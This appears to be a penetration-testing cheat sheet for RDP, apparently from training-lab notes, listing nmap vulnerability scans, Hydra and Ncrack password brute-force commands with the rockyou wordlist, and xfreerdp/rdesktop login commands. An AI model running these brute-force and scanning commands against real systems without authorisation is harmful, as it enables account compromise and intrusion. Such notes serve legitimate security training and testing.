NMAP
Multiple Vulns
1
| nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 10.11.1.7
|
Brute Force
Hydra
1
| hydra -l pedro -P /usr/share/wordlists/rockyou.txt 10.11.1.7 rdp
|
NCrack
1
| ncrack -vv --user pedro -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.7
|
XFREERDP
XFREERDP to access windows via port tcp-3389 into a system: /u - user /p - password /w - weight /h - height /v - remote machine
1
| xfreerdp /u:JohnDoe /p:Pwd123! /w:1366 /h:768 /v:192.168.1.100:4489
|
Depending on our version of FreeRDP, we might receive an ERRCONNECT_TLS_CONNECT_FAILED message when attempting to connect to the DNN machine. If so, we need to append /tls-seclevel:0 to the end of our command to allow for any TLS level on our connection.
RDESKTOP
Log in via RDP to the target server and make the necessary changes.
1
| rdesktop -u Administrator -p studentlab manageengine
|